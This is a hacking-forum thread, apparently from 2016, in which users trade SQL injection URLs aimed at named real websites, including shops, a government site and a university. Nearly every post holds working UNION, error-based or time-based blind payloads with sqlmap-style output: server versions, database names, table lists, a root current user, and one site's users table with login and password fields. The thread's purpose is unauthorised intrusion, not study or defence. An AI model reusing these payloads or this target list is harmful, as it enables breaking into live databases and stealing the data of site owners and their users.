
16.04.2016, 11:05
Regular
Registered: 18.07.2013
Posts: 300
With us: 6747446
Reputation: 32
Code:
_ttp://taxiforsazh.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
5.1.71-cll-lve

21.04.2016, 17:10
Newbie
Registered: 24.07.2011
Posts: 23
With us: 7791446
Reputation: 10
Code:
http://relax-nk.ru/rub.php?id=1 union all select @@version,2
5.5.47
http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6
5.5.48-cll 3
http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8
5.5.29-log
www.powermanager.co.kr/bbs/shop_.php?cno=2
---
Parameter: cno (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cno=2) AND 2160=2160 AND (1973=1973
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12
Database: powermgcok
http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5
5.1.73-cll
http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(),char(32)))+)
5.5.45-cll-lve
http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9
5.1.73
http://www.zeogames.net/game.php?id=6
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 7494=7494
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

22.04.2016, 15:40
Newbie
Registered: 24.07.2011
Posts: 23
With us: 7791446
Reputation: 10
Code:
http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3
5.0.96-log
http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6
10.1.13-MariaDB
http://www.nbrri.gov.ng/sites/news.php?ID=2
---
Parameter: ID (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(5424=5424,1))),0x716b707871))
Type: AND/OR time-based blind
Title: MySQL = 5.0.12 AND time-based blind (SELECT)
Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu
---
back-end DBMS: MySQL 5.0.12
http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
5.5.43-37.2-log

24.04.2016, 14:10
Newbie
Registered: 24.07.2011
Posts: 23
With us: 7791446
Reputation: 10
Code:
http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
5.5.34-32.0-log
=================================================================================================================
https://www.fairradio.com/catalog.php?mode=view&categoryid=214
---
Parameter: categoryid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] fairrad_radio
[*] information_schema
=================================================================================================================
http://www.dataapex.com/catalog.php?catCategory=1
---
Parameter: catCategory (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
=================================================================================================================
http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
5.5.41-0+wheezy1
+ XSS
=================================================================================================================
http://jewelfox.ru/catalog.php?catId=ard
---
Parameter: catId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
Database: jewelfo9_db73544m
[32 tables]
=================================================================================================================
http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
=================================================================================================================
http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
4.0.24_Debian-10sarge3-log

26.04.2016, 11:39
Learner
Registered: 31.07.2015
Posts: 41
With us: 5677526
Reputation: 1
Code:
http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,version(),54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--
rentaproject_szn
5.0.82-log 7

01.05.2016, 00:12
Forum member
Registered: 25.04.2013
Posts: 153
With us: 6868406
Reputation: 2
Code:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:
[*] dealdb
[*] information_schema
[*] test
Otherwise it's all just small fry!


01.05.2016, 00:21
Forum member
Registered: 20.04.2016
Posts: 185
With us: 5297366
Reputation: 47
RWD, work it out by hand.
Code:
http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user())))+--+

15.08.2016, 02:01
Forum member
Registered: 25.04.2013
Posts: 153
With us: 6868406
Reputation: 2
Current User: root@localhost
Code:
http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2870=2870
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.5
Current DB: lafinancepourtousquiz
Data Base Found: information_schema
Data Base Found: grand_quiz
Data Base Found: lafinancepourtous
Data Base Found: lafinancepourtousgame
Data Base Found: lafinancepourtousquiz
Data Base Found: mysql
Data Base Found: performance_schema
Data Base Found: phpmyadmin
Data Base Found: portail
Data Base Found: preprod
current user: 'atame_@localhost'
Code:
http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=9 AND 7978=7978
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=9 AND SLEEP(5)
---
web application technology: Apache, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
available databases [4]:
[*] information_schema
[*] lc_comunidad
[*] lc_dbase
[*] lc_topsites
Code:
http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5266=5266
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12

15.08.2016, 19:44
Newbie
Registered: 14.08.2016
Posts: 17
With us: 5130326
Reputation: 0
Code:
http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+
version: 5.6.28-1+wheezy1+mh2-log
tables: adv,adv_places,pages,places,users,videos
users fields: id,login,password,city,mail,ip,date_reg,priv
I didn't find the admin panel or anything related to it.((((

18.08.2016, 22:05
Regular
Registered: 18.07.2013
Posts: 300
With us: 6747446
Reputation: 32
Code:
http://www.bogatiyhohol.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+